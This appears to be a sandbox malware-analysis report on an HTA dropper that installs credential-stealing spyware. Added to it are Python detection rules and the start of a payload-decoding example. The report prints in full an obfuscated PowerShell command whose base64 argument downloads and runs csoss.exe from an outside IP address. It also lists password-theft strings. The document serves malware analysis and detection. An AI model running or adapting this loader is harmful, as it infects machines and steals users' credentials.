                    Source: 6.2.csoss.exe.2410000.1.raw.unpack, UltraSpeed.csCryptographic APIs: 'TransformFinalBlock'
                    Source: 6.2.csoss.exe.2410000.1.raw.unpack, COVIDPickers.csCryptographic APIs: 'TransformFinalBlock'
                    Source: classification engineClassification label: mal100.troj.spyw.expl.evad.winHTA@14/15@2/3
Source: C:\Users\user\AppData\Roaming\csoss.exe | Code function: 6_2_0021A06A GetLastError,FormatMessageW | 6_2_0021A06A
Source: C:\Users\user\AppData\Roaming\csoss.exe | Code function: 6_2_002081CB AdjustTokenPrivileges,CloseHandle | 6_2_002081CB
Source: C:\Users\user\AppData\Roaming\csoss.exe | Code function: 6_2_002087E1 LookupPrivilegeValueW,AdjustTokenPrivileges,GetLastError | 6_2_002087E1
Source: C:\Users\user\AppData\Roaming\csoss.exe | Code function: 6_2_0021B333 SetErrorMode,GetDiskFreeSpaceExW,SetErrorMode | 6_2_0021B333
Source: C:\Users\user\AppData\Roaming\csoss.exe | Code function: 6_2_0022EE0D CreateToolhelp32Snapshot,Process32FirstW,Process32NextW,CloseHandle | 6_2_0022EE0D
Source: C:\Users\user\AppData\Roaming\csoss.exe | Code function: 6_2_002283BB CoInitialize,CoUninitialize,CoCreateInstance,IIDFromString,VariantInit,VariantClear | 6_2_002283BB
Source: C:\Users\user\AppData\Roaming\csoss.exe | Code function: 6_2_001B4E89 CreateStreamOnHGlobal,FindResourceExW,LoadResource,SizeofResource,LockResource | 6_2_001B4E89
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\ZVZFKMB9\csoss[1].exe
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Mutant created: NULL
Source: C:\Windows\System32\conhost.exe | Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7788:120:WilError_03
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | File created: C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_40fbnimg.0ms.ps1
Source: C:\Windows\SysWOW64\mshta.exe | File read: C:\Users\user\Desktop\desktop.ini
Source: C:\Windows\SysWOW64\mshta.exe | Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
Source: RegSvcs.exe, 00000007.00000002.2506031760.00000000022D0000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000007.00000002.2506031760.00000000022DE000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000007.00000002.2506031760.00000000022C0000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: CREATE TABLE password_notes (id INTEGER PRIMARY KEY AUTOINCREMENT, parent_id INTEGER NOT NULL REFERENCES logins ON UPDATE CASCADE ON DELETE CASCADE DEFERRABLE INITIALLY DEFERRED, key VARCHAR NOT NULL, value BLOB, date_created INTEGER NOT NULL, confidential INTEGER, UNIQUE (parent_id, key));
Source: needagoodplanforsuccesstogetbackbest.hta | Virustotal: Detection: 46%
Source: needagoodplanforsuccesstogetbackbest.hta | ReversingLabs: Detection: 27%
Source: unknown | Process created: C:\Windows\SysWOW64\mshta.exe mshta.exe "C:\Users\user\Desktop\needagoodplanforsuccesstogetbackbest.hta"
Source: C:\Windows\SysWOW64\mshta.exe | Process created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\system32\cmd.exe" "/C POwERSHell.exe -ex bYpaSS -NoP -w 1 -C deVIcecreDENTiALDeplOYMENt.exE ; IeX($(iEX('[sYSTeM.TeXt.EnCOdIng]'+[cHAr]58+[Char]0X3a+'UtF8.gETStrINg([sYSteM.cOnVERT]'+[ChAR]0X3a+[ChAR]58+'frOMbASe64STrIng('+[CHAr]0x22+'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'+[char]34+'))')))"
Source: C:\Windows\SysWOW64\cmd.exe | Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\SysWOW64\cmd.exe | Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe POwERSHell.exe -ex bYpaSS -NoP -w 1 -C deVIcecreDENTiALDeplOYMENt.exE ; IeX($(iEX('[sYSTeM.TeXt.EnCOdIng]'+[cHAr]58+[Char]0X3a+'UtF8.gETStrINg([sYSteM.cOnVERT]'+[ChAR]0X3a+[ChAR]58+'frOMbASe64STrIng('+[CHAr]0x22+'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'+[char]34+'))')))"
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\dkgvurtz\dkgvurtz.cmdline"
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe | Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RESEEFD.tmp" "c:\Users\user\AppData\Local\Temp\dkgvurtz\CSCEFC899AF36F541BC9861FF65BE4F3BB.TMP"
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Process created: C:\Users\user\AppData\Roaming\csoss.exe "C:\Users\user\AppData\Roaming\csoss.exe"
Source: C:\Users\user\AppData\Roaming\csoss.exe | Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe "C:\Users\user\AppData\Roaming\csoss.exe"
Source: C:\Windows\SysWOW64\mshta.exe | Section loaded: iertutil.dll
Source: C:\Windows\SysWOW64\mshta.exe | Section loaded: wldp.dll
Source: C:\Windows\SysWOW64\mshta.exe | Section loaded: mshtml.dll
Source: C:\Windows\SysWOW64\mshta.exe | Section loaded: sspicli.dll
Source: C:\Windows\SysWOW64\mshta.exe | Section loaded: powrprof.dll
Source: C:\Windows\SysWOW64\mshta.exe | Section loaded: winhttp.dll
Source: C:\Windows\SysWOW64\mshta.exe | Section loaded: wkscli.dll
Source: C:\Windows\SysWOW64\mshta.exe | Section loaded: netutils.dll
Source: C:\Windows\SysWOW64\mshta.exe | Section loaded: umpdc.dll
Source: C:\Windows\SysWOW64\mshta.exe | Section loaded: cryptbase.dll
Source: C:\Windows\SysWOW64\mshta.exe | Section loaded: urlmon.dll
Source: C:\Windows\SysWOW64\mshta.exe | Section loaded: srvcli.dll
Source: C:\Windows\SysWOW64\mshta.exe | Section loaded: kernel.appcore.dll
Source: C:\Windows\SysWOW64\mshta.exe | Section loaded: msiso.dll
Source: C:\Windows\SysWOW64\mshta.exe | Section loaded: uxtheme.dll
Source: C:\Windows\SysWOW64\mshta.exe | Section loaded: srpapi.dll
Source: C:\Windows\SysWOW64\mshta.exe | Section loaded: windows.storage.dll
Source: C:\Windows\SysWOW64\mshta.exe | Section loaded: propsys.dll
Source: C:\Windows\SysWOW64\mshta.exe | Section loaded: msimtf.dll
Source: C:\Windows\SysWOW64\mshta.exe | Section loaded: dxgi.dll
Source: C:\Windows\SysWOW64\mshta.exe | Section loaded: resourcepolicyclient.dll
Source: C:\Windows\SysWOW64\mshta.exe | Section loaded: textinputframework.dll
Source: C:\Windows\SysWOW64\mshta.exe | Section loaded: coreuicomponents.dll
Source: C:\Windows\SysWOW64\mshta.exe | Section loaded: coremessaging.dll
Source: C:\Windows\SysWOW64\mshta.exe | Section loaded: ntmarta.dll
Source: C:\Windows\SysWOW64\mshta.exe | Section loaded: wintypes.dll
Source: C:\Windows\SysWOW64\mshta.exe | Section loaded: dataexchange.dll
Source: C:\Windows\SysWOW64\mshta.exe | Section loaded: d3d11.dll
Source: C:\Windows\SysWOW64\mshta.exe | Section loaded: dcomp.dll
Source: C:\Windows\SysWOW64\mshta.exe | Section loaded: twinapi.appcore.dll
Source: C:\Windows\SysWOW64\mshta.exe | Section loaded: vbscript.dll
Source: C:\Windows\SysWOW64\mshta.exe | Section loaded: amsi.dll
Source: C:\Windows\SysWOW64\mshta.exe | Section loaded: userenv.dll
Source: C:\Windows\SysWOW64\mshta.exe | Section loaded: profapi.dll
Source: C:\Windows\SysWOW64\mshta.exe | Section loaded: version.dll
Source: C:\Windows\SysWOW64\mshta.exe | Section loaded: mpr.dll
Source: C:\Windows\SysWOW64\mshta.exe | Section loaded: scrrun.dll
Source: C:\Windows\SysWOW64\mshta.exe | Section loaded: sxs.dll
Source: C:\Windows\SysWOW64\mshta.exe | Section loaded: msasn1.dll
Source: C:\Windows\SysWOW64\mshta.exe | Section loaded: gpapi.dll
Source: C:\Windows\SysWOW64\mshta.exe | Section loaded: d2d1.dll
Source: C:\Windows\SysWOW64\mshta.exe | Section loaded: dwrite.dll
Source: C:\Windows\SysWOW64\mshta.exe | Section loaded: edputil.dll
Source: C:\Windows\SysWOW64\mshta.exe | Section loaded: windows.staterepositoryps.dll
Source: C:\Windows\SysWOW64\mshta.exe | Section loaded: appresolver.dll
Source: C:\Windows\SysWOW64\mshta.exe | Section loaded: bcp47langs.dll
Source: C:\Windows\SysWOW64\mshta.exe | Section loaded: slc.dll
Source: C:\Windows\SysWOW64\mshta.exe | Section loaded: sppc.dll
Source: C:\Windows\SysWOW64\mshta.exe | Section loaded: onecorecommonproxystub.dll
Source: C:\Windows\SysWOW64\mshta.exe | Section loaded: onecoreuapcommonproxystub.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: atl.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: mscoree.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: kernel.appcore.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: version.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: vcruntime140_clr0400.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: ucrtbase_clr0400.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: cryptsp.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: rsaenh.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: cryptbase.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: wldp.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: windows.storage.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: amsi.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: userenv.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: profapi.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: msasn1.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: msisip.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: wshext.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: appxsip.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: opcservices.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: gpapi.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: secur32.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: sspicli.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: uxtheme.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: urlmon.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: iertutil.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: srvcli.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: netutils.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: propsys.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: wininet.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: kdscli.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: ncrypt.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: ntasn1.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: ondemandconnroutehelper.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: winhttp.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: mswsock.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: iphlpapi.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: winnsi.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: edputil.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: windows.staterepositoryps.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: wintypes.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: appresolver.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: bcp47langs.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: slc.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: sppc.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: onecorecommonproxystub.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: onecoreuapcommonproxystub.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: apphelp.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: ntmarta.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe | Section loaded: vcruntime140_clr0400.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe | Section loaded: ucrtbase_clr0400.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe | Section loaded: version.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe | Section loaded: kernel.appcore.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe | Section loaded: mscoree.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe | Section loaded: cryptsp.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe | Section loaded: rsaenh.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe | Section loaded: cryptbase.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe | Section loaded: vcruntime140_clr0400.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe | Section loaded: ucrtbase_clr0400.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe | Section loaded: cryptsp.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe | Section loaded: rsaenh.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe | Section loaded: cryptbase.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe | Section loaded: kernel.appcore.dll
Source: C:\Users\user\AppData\Roaming\csoss.exe | Section loaded: wsock32.dll
Source: C:\Users\user\AppData\Roaming\csoss.exe | Section loaded: version.dll
Source: C:\Users\user\AppData\Roaming\csoss.exe | Section loaded: winmm.dll
Source: C:\Users\user\AppData\Roaming\csoss.exe | Section loaded: mpr.dll
Source: C:\Users\user\AppData\Roaming\csoss.exe | Section loaded: wininet.dll
Source: C:\Users\user\AppData\Roaming\csoss.exe | Section loaded: iphlpapi.dll
Source: C:\Users\user\AppData\Roaming\csoss.exe | Section loaded: userenv.dll
Source: C:\Users\user\AppData\Roaming\csoss.exe | Section loaded: uxtheme.dll
Source: C:\Users\user\AppData\Roaming\csoss.exe | Section loaded: kernel.appcore.dll
Source: C:\Users\user\AppData\Roaming\csoss.exe | Section loaded: windows.storage.dll
Source: C:\Users\user\AppData\Roaming\csoss.exe | Section loaded: wldp.dll
Source: C:\Windows\SysWOW64\mshta.exe | Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{25336920-03F9-11CF-8FD0-00AA00686F13}\InProcServer32
Source: C:\Windows\SysWOW64\mshta.exe | Key opened: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Internet Explorer\Settings
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | File opened: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorrc.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Key opened: HKEY_CURRENT_USER\Software\Microsoft\Office\15.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676
Source: Binary string: wntdll.pdbUGP source: csoss.exe, 00000006.00000003.1392226425.00000000040F0000.00000004.00001000.00020000.00000000.sdmp, csoss.exe, 00000006.00000003.1386036153.0000000003F30000.00000004.00001000.00020000.00000000.sdmp
Source: Binary string: wntdll.pdb source: csoss.exe, 00000006.00000003.1392226425.00000000040F0000.00000004.00001000.00020000.00000000.sdmp, csoss.exe, 00000006.00000003.1386036153.0000000003F30000.00000004.00001000.00020000.00000000.sdmp
Source: Binary string: q7C:\Users\user\AppData\Local\Temp\dkgvurtz\dkgvurtz.pdb source: powershell.exe, 00000003.00000002.1394587679.00000000050BD000.00000004.00000800.00020000.00000000.sdmp
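The process-creation entries above give the whole chain: mshta.exe starts cmd.exe, cmd.exe starts powershell.exe, powershell.exe drives csc.exe (compiling a file under %TEMP%) and then the dropped %APPDATA%\csoss.exe, and csoss.exe starts RegSvcs.exe with csoss.exe's own path as the command line. Those relationships are what the Sigma hits in the summary (suspicious MSHTA child process, .NET compiler compiling from a suspicious location) key on. The Python below is an added example, not part of the Joe Sandbox report: it reconstructs those events from the entries above (with the base64 argument replaced by a placeholder) and runs equivalent checks over them. The rule names, the flag threshold and the 0.3 upper-case ratio are this example's own choices, not Sigma identifiers or Joe Sandbox thresholds.

```python
import re
from pathlib import PureWindowsPath

# Obfuscated PowerShell command line as recorded in the report; the base64
# argument is replaced by a placeholder (event data constructed for this example).
PS_CMD = (
    "POwERSHell.exe -ex bYpaSS -NoP -w 1 -C deVIcecreDENTiALDeplOYMENt.exE ; "
    "IeX($(iEX('[sYSTeM.TeXt.EnCOdIng]'+[cHAr]58+[Char]0X3a+'UtF8.gETStrINg([sYSteM.cOnVERT]'"
    "+[ChAR]0X3a+[ChAR]58+'frOMbASe64STrIng('+[CHAr]0x22+'<base64 omitted>'+[char]34+'))')))"
)

# (parent image, child image, child command line), in the order the report lists them.
EVENTS = [
    ("unknown", r"C:\Windows\SysWOW64\mshta.exe",
     r'mshta.exe "C:\Users\user\Desktop\needagoodplanforsuccesstogetbackbest.hta"'),
    (r"C:\Windows\SysWOW64\mshta.exe", r"C:\Windows\SysWOW64\cmd.exe",
     r'"C:\Windows\system32\cmd.exe" "/C ' + PS_CMD + '"'),
    (r"C:\Windows\SysWOW64\cmd.exe", r"C:\Windows\System32\conhost.exe",
     r"C:\Windows\system32\conhost.exe 0xffffffff -ForceV1"),
    (r"C:\Windows\SysWOW64\cmd.exe",
     r"C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe", PS_CMD),
    (r"C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe",
     r"C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe",
     r'"C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe" /noconfig /fullpaths '
     r'@"C:\Users\user\AppData\Local\Temp\dkgvurtz\dkgvurtz.cmdline"'),
    (r"C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe",
     r"C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe",
     r'C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 '
     r'"/OUT:C:\Users\user\AppData\Local\Temp\RESEEFD.tmp" '
     r'"c:\Users\user\AppData\Local\Temp\dkgvurtz\CSCEFC899AF36F541BC9861FF65BE4F3BB.TMP"'),
    (r"C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe",
     r"C:\Users\user\AppData\Roaming\csoss.exe", r'"C:\Users\user\AppData\Roaming\csoss.exe"'),
    (r"C:\Users\user\AppData\Roaming\csoss.exe",
     r"C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe",
     r'"C:\Users\user\AppData\Roaming\csoss.exe"'),
]

SCRIPT_HOSTS = {"cmd.exe", "powershell.exe", "pwsh.exe", "wscript.exe", "cscript.exe",
                "rundll32.exe", "regsvr32.exe", "mshta.exe", "certutil.exe", "bitsadmin.exe"}
USER_WRITABLE = ("\\appdata\\roaming\\", "\\appdata\\local\\temp\\", "\\users\\public\\", "\\programdata\\")


def basename(path):
    return PureWindowsPath(path).name.lower()


def claimed_image(cmdline):
    """First token of a command line: the image the command line claims to run."""
    m = re.match(r'\s*(?:"([^"]+)"|(\S+))', cmdline)
    return (m.group(1) or m.group(2)) if m else ""


def upper_ratio(text):
    """Share of upper-case letters; ordinary command lines sit well below 0.3."""
    letters = [ch for ch in text if ch.isalpha()]
    return sum(ch.isupper() for ch in letters) / len(letters) if letters else 0.0


def check(parent, image, cmdline):
    """Return the names of the rules this process-creation event triggers."""
    hits, p, c, cl = [], basename(parent), basename(image), cmdline.lower()
    if p == "mshta.exe" and c in SCRIPT_HOSTS:
        hits.append("mshta_child_process")
    if re.search(r"\bpowershell(?:\.exe)?\b", cl):
        flags = (
            re.search(r"-(?:ex|ep|exec|executionpolicy)\s+bypass", cl),
            re.search(r"-nop(?:rofile)?\b", cl),
            re.search(r"-w(?:indowstyle)?\s+(?:1|hidden)\b", cl),
            "frombase64string" in cl and re.search(r"\biex\b|invoke-expression", cl),
            re.search(r"\[char\]\s*(?:0x[0-9a-f]+|\d+)", cl),
        )
        if sum(bool(f) for f in flags) >= 3:
            hits.append("suspicious_powershell_cmdline")
        # drop anything that looks like a base64 blob before measuring letter case
        if upper_ratio(re.sub(r"[A-Za-z0-9+/]{40,}={0,2}", "", cmdline)) > 0.3:
            hits.append("powershell_case_anomaly")
    if c == "csc.exe" and "\\appdata\\local\\temp\\" in cl:
        hits.append("csc_compiles_from_temp")
    if p in SCRIPT_HOSTS and any(d in image.lower() for d in USER_WRITABLE):
        hits.append("script_host_runs_dropped_exe")
    claimed = basename(claimed_image(cmdline))
    if claimed and claimed != c:
        hits.append("image_cmdline_mismatch")
    return hits


def scan(events):
    return [(basename(image), check(parent, image, cmdline)) for parent, image, cmdline in events]


if __name__ == "__main__":
    for name, hits in scan(EVENTS):
        print(f"{name:16} {', '.join(hits) or '-'}")
```

The image/command-line mismatch check is the one worth keeping in a production ruleset: a RegSvcs.exe started normally never carries another binary's path as its command line, and in this report that step is where the "Writes to foreign memory regions" and "Maps a DLL or memory area into another process" signatures from the summary apply. The case-anomaly ratio is a weak signal on its own (short command lines and acronyms push it up), which is why the example only reports it together with a PowerShell launch.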

Data Obfuscation

                    Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe POwERSHell.exe -ex bYpaSS -NoP -w 1 -C deVIcecreDENTiALDeplOYMENt.exE ; IeX($(iEX('[sYSTeM.TeXt.EnCOdIng]'+[cHAr]58+[Char]0X3a+'UtF8.gETStrINg([sYSteM.cOnVERT]'+[ChAR]0X3a+[ChAR]58+'frOMbASe64STrIng('+[CHAr]0x22+'JEd2QVYgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgPSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBBRGQtVFlwRSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtTWVtYmVyREVGaU5JdGlPbiAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAnW0RsbEltcG9ydCgidXJsTU9OLkRsbCIsICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIENoYXJTZXQgPSBDaGFyU2V0LlVuaWNvZGUpXXB1YmxpYyBzdGF0aWMgZXh0ZXJuIEludFB0ciBVUkxEb3dubG9hZFRvRmlsZShJbnRQdHIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgSSxzdHJpbmcgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgYXlSVVR0LHN0cmluZyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBxdU5kcFNxLHVpbnQgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgQkksSW50UHRyICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIG9oc28pOycgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLU5hbWUgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgInJPbFN5IiAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtbkFNRVNwYWNlICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIGRlS3lvTmQgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLVBhc3NUaHJ1OyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAkR3ZBVjo6VVJMRG93bmxvYWRUb0ZpbGUoMCwiaHR0cDovLzIzLjk1LjIzNS4yOC8xMTAvY3Nvc3MuZXhlIiwiJGVOVjpBUFBEQVRBXGNzb3NzLmV4ZSIsMCwwKTtTdEFyVC1zTEVlUCgzKTtpTlZvS0UtSVRFTSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAiJGVuVjpBUFBEQVRBXGNzb3NzLmV4ZSI='+[char]34+'))')))"
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\dkgvurtz\dkgvurtz.cmdline"
Source: C:\Users\user\AppData\Roaming\csoss.exe | Code function: 6_2_001B4B37 LoadLibraryA,GetProcAddress | 6_2_001B4B37
Source: C:\Users\user\AppData\Roaming\csoss.exe | Code function: 6_2_001D8945 push ecx; ret | 6_2_001D8958
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | File created (dropped file): C:\Users\user\AppData\Roaming\csoss.exe
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | File created (dropped file): C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\ZVZFKMB9\csoss[1].exe
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe | File created (dropped file): C:\Users\user\AppData\Local\Temp\dkgvurtz\dkgvurtz.dll
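The powershell.exe command line in the entry above randomises letter case, builds the `::` operator and the double quotes out of `[char]` casts so that neither `FromBase64String("` nor the quoted argument appears literally, and keeps the real script in the base64 argument. The Python below is an added example, not code from the report or from the sample: it folds that string concatenation, decodes the argument (transcribed from the entry above; the long runs of encoded spaces, `ICAg` = three spaces, are written as repeats) and pulls out the indicators. The helper names are this example's own.

```python
import base64
import re

# Base64 argument of the powershell.exe command line recorded above, transcribed
# token by token; the runs of encoded spaces are written as repeats so the
# literal stays readable (string constructed for this example from the report).
_SP = "ICAg"
B64_ARG = (
    "JEd2QVYg" + _SP * 11 + "PSAg" + _SP * 10 + "ICBBRGQtVFlwRSAg" + _SP * 10
    + "ICAtTWVtYmVyREVGaU5JdGlPbiAg" + _SP * 10
    + "ICAnW0RsbEltcG9ydCgidXJsTU9OLkRsbCIs" + _SP * 11
    + "IENoYXJTZXQgPSBDaGFyU2V0LlVuaWNvZGUpXXB1YmxpYyBzdGF0aWMgZXh0ZXJu"
    + "IEludFB0ciBVUkxEb3dubG9hZFRvRmlsZShJbnRQdHIg" + _SP * 11
    + "SSxzdHJpbmcg" + _SP * 11 + "YXlSVVR0LHN0cmluZyAg" + _SP * 10
    + "ICBxdU5kcFNxLHVpbnQg" + _SP * 11 + "QkksSW50UHRy" + _SP * 11
    + "IG9oc28pOycg" + _SP * 11 + "LU5hbWUg" + _SP * 11 + "InJPbFN5IiAg" + _SP * 10
    + "ICAtbkFNRVNwYWNl" + _SP * 11 + "IGRlS3lvTmQg" + _SP * 11
    + "LVBhc3NUaHJ1OyAg" + _SP * 10
    + "ICAkR3ZBVjo6VVJMRG93bmxvYWRUb0ZpbGUoMCwiaHR0cDovLzIzLjk1LjIzNS4yOC8xMTAv"
    + "Y3Nvc3MuZXhlIiwiJGVOVjpBUFBEQVRBXGNzb3NzLmV4ZSIsMCwwKTtTdEFyVC1zTEVlUCgz"
    + "KTtpTlZvS0UtSVRFTSAg" + _SP * 10 + "ICAiJGVuVjpBUFBEQVRBXGNzb3NzLmV4ZSI="
)

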